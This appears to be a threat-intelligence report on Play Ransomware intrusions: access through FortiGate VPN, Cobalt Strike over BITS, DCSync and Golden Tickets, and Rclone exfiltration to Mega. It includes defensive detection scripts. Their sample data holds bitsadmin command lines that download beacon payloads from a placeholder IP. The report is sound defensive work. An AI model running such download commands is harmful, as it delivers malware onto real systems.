CTI Swarm
MANDIANT

Inside the Play Ransomware playbook: from initial access to double extortion in 72 hours

Strategic Summary

Mandiant analyzed six recent Play Ransomware incidents at European manufacturers and found a remarkably short attack timeline: a median of 51 hours from initial access to exfiltration and 71 hours to encryption. The operators favor the FortiGate SSL-VPN flaw (CVE-2025-43411) as the entry point, fast AD discovery followed by DCSync, and Rclone-based exfiltration to Mega.io. Recommended response: patch FortiGate, reset the krbtgt password twice, and deploy detections for the BITS-transfer delivery pattern.

Key Findings

  • Median time from initial access to ransomware deployment is just 71 hours, far shorter than the 2024 average of 9 days.
  • FortiGate CVE-2025-43411 is the dominant initial-access vector (five of six cases); because the flaw is post-authentication, it is paired with valid credentials bought from recent infostealer log sales.
  • Operators use Cobalt Strike delivered via renamed BITS transfers, a pattern with a clean detection signature.
  • DCSync against the domain controller within the first 12 hours is consistent across all six investigations.
  • Exfiltration occurs through Rclone to Mega.io — netflow monitoring on egress is the highest-signal late-stage detection.
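The egress check that this finding points at, as an added example written for this page rather than Mandiant's own tooling: netflow carries only IP addresses, so the script joins flow records to a hostname map (in practice passive DNS or proxy logs) and sums bytes per internal host per hour to Mega destinations, flagging anything over an assumed threshold. The flow records, the IP-to-hostname map, the internal ranges and the 250 MiB threshold are all constructed; the IPs are documentation ranges, not Mega's.

```python
from collections import defaultdict
from datetime import datetime
from ipaddress import ip_address, ip_network

# Public Mega domains. Rclone's mega backend talks HTTPS to hosts under these,
# so the destination and the byte volume are the only signals in netflow.
MEGA_DOMAINS = ("mega.nz", "mega.co.nz", "mega.io")
INTERNAL_NETS = [ip_network("10.0.0.0/8"), ip_network("172.16.0.0/12"),
                 ip_network("192.168.0.0/16")]
# Assumed threshold: 250 MiB from one internal host to Mega within one hour.
THRESHOLD_BYTES = 250 * 1024 * 1024

# Constructed passive-DNS mapping from destination IP to hostname. The storage
# node name mimics the userstorage.mega.co.nz pattern; the IPs are made up.
DST_HOSTNAMES = {
    "203.0.113.50": "gfs270n123.userstorage.mega.co.nz",
    "203.0.113.51": "g.api.mega.co.nz",
    "198.51.100.7": "cdn.update-vendor.example",
}

# Constructed flow records: (start time UTC, src IP, dst IP, dst port, bytes out).
SAMPLE_FLOWS = [
    ("2025-03-04T01:02:00Z", "10.20.30.40", "203.0.113.51", 443, 120_000),
    ("2025-03-04T01:05:00Z", "10.20.30.40", "203.0.113.50", 443, 180 * 1024 * 1024),
    ("2025-03-04T01:41:00Z", "10.20.30.40", "203.0.113.50", 443, 210 * 1024 * 1024),
    ("2025-03-04T02:10:00Z", "10.20.30.40", "203.0.113.50", 443, 90 * 1024 * 1024),
    # Large transfer, but not to Mega: stays out of this detection.
    ("2025-03-04T01:20:00Z", "10.20.30.77", "198.51.100.7", 443, 600 * 1024 * 1024),
    # Small, plausibly legitimate Mega usage from another host.
    ("2025-03-04T01:30:00Z", "10.20.30.88", "203.0.113.50", 443, 3 * 1024 * 1024),
]


def is_internal(ip):
    return any(ip_address(ip) in net for net in INTERNAL_NETS)


def is_mega(dst_ip):
    """True when the resolved hostname is a Mega domain or a subdomain of one."""
    host = DST_HOSTNAMES.get(dst_ip, "").lower()
    return any(host == d or host.endswith("." + d) for d in MEGA_DOMAINS)


def bytes_to_mega_per_host_hour(flows):
    """{(src IP, hour bucket): total bytes sent to Mega} for internal sources."""
    totals = defaultdict(int)
    for start, src, dst, _port, nbytes in flows:
        if not is_internal(src) or not is_mega(dst):
            continue
        bucket = datetime.fromisoformat(start.replace("Z", "+00:00")).strftime("%Y-%m-%dT%H:00Z")
        totals[(src, bucket)] += nbytes
    return dict(totals)


def find_bulk_mega_egress(flows, threshold=THRESHOLD_BYTES):
    """Sorted (src IP, hour bucket, bytes) tuples at or above the threshold."""
    return sorted((src, hour, total)
                  for (src, hour), total in bytes_to_mega_per_host_hour(flows).items()
                  if total >= threshold)


if __name__ == "__main__":
    for src, hour, total in find_bulk_mega_egress(SAMPLE_FLOWS):
        print(f"{src} {hour} {total / 1024 / 1024:.0f} MiB to Mega")
```

Tune the threshold against a baseline of normal Mega traffic before alerting on it; one host pushing hundreds of megabytes per hour to Mega storage nodes at night is the shape of the Rclone stage, while a few megabytes from a workstation is usually a user with a personal account. Where the web proxy terminates TLS, rclone's default User-Agent string (rclone/&lt;version&gt;) gives a second, independent signal.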

Full Text

Across six recent Play Ransomware engagements, Mandiant observed an unusually compressed timeline: the median time from initial access to data exfiltration was 51 hours, and from initial access to ransomware deployment 71 hours. The operators rely on a consistent playbook tuned for mid-sized European manufacturers, which is exactly the profile of the Joel-Traber-AG threat model.

Initial access in five of six cases was achieved via the FortiGate SSL-VPN authenticated buffer overflow (CVE-2025-43411). Because the flaw is post-authentication, a valid VPN login is a precondition for exploitation; the credentials had been sourced from infostealer logs sold on the XSS forum within the previous 30 days, so enforcing MFA on the SSL-VPN and invalidating any credential that surfaces in infostealer logs removes that precondition independently of the patch. Once on the perimeter, the actor immediately deploys a Cobalt Strike beacon delivered through a renamed BITS transfer to evade naive AV signatures.
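A detection for the renamed-BITS delivery pattern, as an added example written for this page (it is not the rule from Mandiant's appendix, which is not reproduced here). It runs over constructed Sysmon Event ID 1 records and flags two things: a process whose PE version resource (OriginalFileName) says bitsadmin.exe while its on-disk name does not, and any /transfer download whose source is outside an assumed allowlist of update origins. Field names follow Sysmon; the events, users, paths, URLs and allowlist are constructed.

```python
import re
from pathlib import PureWindowsPath

# Constructed Sysmon Event ID 1 (process creation) records. Field names follow
# Sysmon; users, paths and URLs are made up for this example.
SAMPLE_EVENTS = [
    # Legitimate: real bitsadmin.exe pulling from an approved update origin.
    {"Image": r"C:\Windows\System32\bitsadmin.exe", "OriginalFileName": "bitsadmin.exe",
     "User": r"NT AUTHORITY\SYSTEM",
     "CommandLine": r"bitsadmin /transfer wu /download /priority high "
                    r"https://download.windowsupdate.com/c/msdownload/update/x.cab C:\Windows\Temp\x.cab"},
    # Renamed copy of bitsadmin.exe pulling a payload from an untrusted host.
    {"Image": r"C:\Users\Public\svchosts.exe", "OriginalFileName": "bitsadmin.exe",
     "User": r"CORP\jdoe",
     "CommandLine": r"svchosts.exe /transfer job1 /download /priority foreground "
                    r"http://203.0.113.10/cs.dll C:\Users\Public\cs.dll"},
    # Genuine bitsadmin.exe, but the origin is not an approved update source.
    {"Image": r"C:\Windows\System32\bitsadmin.exe", "OriginalFileName": "bitsadmin.exe",
     "User": r"CORP\svc-backup",
     "CommandLine": r"bitsadmin /transfer dl /download http://203.0.113.10/beacon.exe C:\ProgramData\beacon.exe"},
    # Unrelated process: no finding.
    {"Image": r"C:\Windows\System32\notepad.exe", "OriginalFileName": "NOTEPAD.EXE",
     "User": r"CORP\jdoe", "CommandLine": "notepad.exe"},
]

# Assumed allowlist of download origins that legitimately use BITS in this estate.
TRUSTED_ORIGINS = ("https://download.windowsupdate.com/",
                   "https://wsus.corp.example/")

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def is_renamed_bitsadmin(ev):
    """The PE version resource still says bitsadmin.exe but the file on disk does not."""
    original = ev.get("OriginalFileName", "").lower()
    on_disk = PureWindowsPath(ev.get("Image", "")).name.lower()
    return original == "bitsadmin.exe" and on_disk != "bitsadmin.exe"


def bits_download_from_untrusted(ev):
    """A /transfer job whose source URL is outside the allowlist."""
    cmd = ev.get("CommandLine", "")
    if "/transfer" not in cmd.lower():
        return False
    urls = [u.lower() for u in URL_RE.findall(cmd)]
    return any(not u.startswith(TRUSTED_ORIGINS) for u in urls)


def classify(ev):
    """Return the detection tags that fire for one event (empty list = no finding)."""
    tags = []
    if is_renamed_bitsadmin(ev):
        tags.append("renamed_bitsadmin")
    if bits_download_from_untrusted(ev):
        tags.append("bits_download_untrusted_origin")
    return tags


def scan(events):
    """(user, image basename, tags) for every event that triggered at least one tag."""
    findings = []
    for ev in events:
        tags = classify(ev)
        if tags:
            findings.append((ev["User"], PureWindowsPath(ev["Image"]).name, tags))
    return findings


if __name__ == "__main__":
    for user, image, tags in scan(SAMPLE_EVENTS):
        print(f"{user:<22} {image:<14} {', '.join(tags)}")
```

The OriginalFileName comparison is what catches a renamed binary: Sysmon reads it from the PE's version resource, which the operator would have to patch separately to defeat the check. The same logic applies to PowerShell's Start-BitsTransfer, which would need its own command-line match since it has no /transfer switch.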

Discovery is fast and noisy: nltest, AdFind, and a custom port scanner are run within the first hour. The operators target the domain controllers first to obtain the krbtgt hash via DCSync, then forge Golden Tickets to access file servers and ERP databases. Two things follow for defenders. DCSync is a directory-replication request, so the account issuing it must already hold replication rights (in practice Domain Admin-equivalent): by the time the request is seen, privilege escalation has already happened. The request is itself loggable on the DC as Security Event ID 4662 carrying the replication extended-rights GUIDs from an account that is not a domain controller. Exfiltration is staged through Rclone to a Mega.io account, a pattern visible in netflow if egress is monitored.
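A check for the DCSync step, as an added example written for this page rather than Mandiant's tooling: it runs over constructed Security Event ID 4662 records, keeps those whose Properties field lists the replication extended rights, drops the principals expected to replicate (DC machine accounts and an Azure AD Connect sync account), and reports how many hours after an assumed initial-access time each remaining request occurred, which is the "within the first 12 hours" measurement in the text. The three extended-rights GUIDs are the documented Active Directory values; the account names, timestamps, ObjectType values and allowlist are constructed.

```python
from datetime import datetime

# Documented AD extended-rights GUIDs that a replication (DCSync) request requires.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Assumed allowlist: the only principals expected to replicate in this estate.
EXPECTED_REPLICATORS = {"DC01$", "DC02$", "MSOL_0123abcd"}

# Constructed 4662 records. Field names follow the Windows event schema;
# Properties is the raw multi-line field as the event carries it.
DOMAIN_OBJECT = "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}"
REPL_PROPS = ("Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
              "\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}")
SAMPLE_4662 = [
    # Normal replication between domain controllers.
    {"TimeCreated": "2025-03-02T04:10:07Z", "SubjectUserName": "DC02$",
     "SubjectDomainName": "CORP", "ObjectType": DOMAIN_OBJECT, "Properties": REPL_PROPS},
    # A user account requesting replication rights: the DCSync.
    {"TimeCreated": "2025-03-02T06:42:51Z", "SubjectUserName": "jdoe",
     "SubjectDomainName": "CORP", "ObjectType": DOMAIN_OBJECT, "Properties": REPL_PROPS},
    # Azure AD Connect sync account, allowlisted.
    {"TimeCreated": "2025-03-02T07:00:00Z", "SubjectUserName": "MSOL_0123abcd",
     "SubjectDomainName": "CORP", "ObjectType": DOMAIN_OBJECT, "Properties": REPL_PROPS},
    # Ordinary directory access by the same user: no replication rights, no hit.
    {"TimeCreated": "2025-03-02T07:15:30Z", "SubjectUserName": "jdoe",
     "SubjectDomainName": "CORP", "ObjectType": "%{bf967aba-0de6-11d0-a285-00aa003049e2}",
     "Properties": "Read Property\n\t{e48d0154-bcf8-11d1-8702-00c04fb96050}"},
]


def replication_rights_in(properties):
    """Names of the replication extended rights present in a 4662 Properties field."""
    lowered = properties.lower()
    return [name for guid, name in REPLICATION_RIGHTS.items() if guid in lowered]


def is_dcsync(ev):
    """Replication rights requested by a principal that is not an expected replicator."""
    return (bool(replication_rights_in(ev["Properties"]))
            and ev["SubjectUserName"] not in EXPECTED_REPLICATORS)


def _parse(ts):
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def find_dcsync(events, initial_access_utc):
    """(hours since initial access, DOMAIN\\user, rights) for each suspected DCSync."""
    t0 = _parse(initial_access_utc)
    hits = []
    for ev in events:
        if not is_dcsync(ev):
            continue
        hours = round((_parse(ev["TimeCreated"]) - t0).total_seconds() / 3600, 1)
        principal = f'{ev["SubjectDomainName"]}\\{ev["SubjectUserName"]}'
        hits.append((hours, principal, replication_rights_in(ev["Properties"])))
    return hits


if __name__ == "__main__":
    # Assumed initial-access time (first FortiGate VPN login with the stolen credential).
    for hours, who, rights in find_dcsync(SAMPLE_4662, "2025-03-02T03:00:00Z"):
        print(f"+{hours}h  {who}  {', '.join(rights)}")
```

Event 4662 only exists if Audit Directory Service Access is enabled on the DCs and the domain object's SACL audits control access, so verify the audit policy before relying on this. A complementary network-side check is DRSUAPI (DsGetNCChanges) traffic to a DC from any IP that is not itself a DC, which does not depend on Windows auditing at all.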

Mandiant's three highest-leverage recommendations for manufacturers: patch FortiGate to 7.4.5 immediately; reset the krbtgt password twice, with at least a 10-hour gap between the resets; and add an EDR detection rule for the specific BITS transfer cmdline pattern documented in the appendix. The double reset matters because a domain controller still honours tickets issued under the previous krbtgt key, so a Golden Ticket forged from the stolen hash remains valid until the second reset has replicated to every DC. The gap should be no shorter than the maximum TGT lifetime (10 hours by default) and long enough for the first reset to replicate, otherwise legitimately issued tickets are invalidated mid-rotation and services start failing.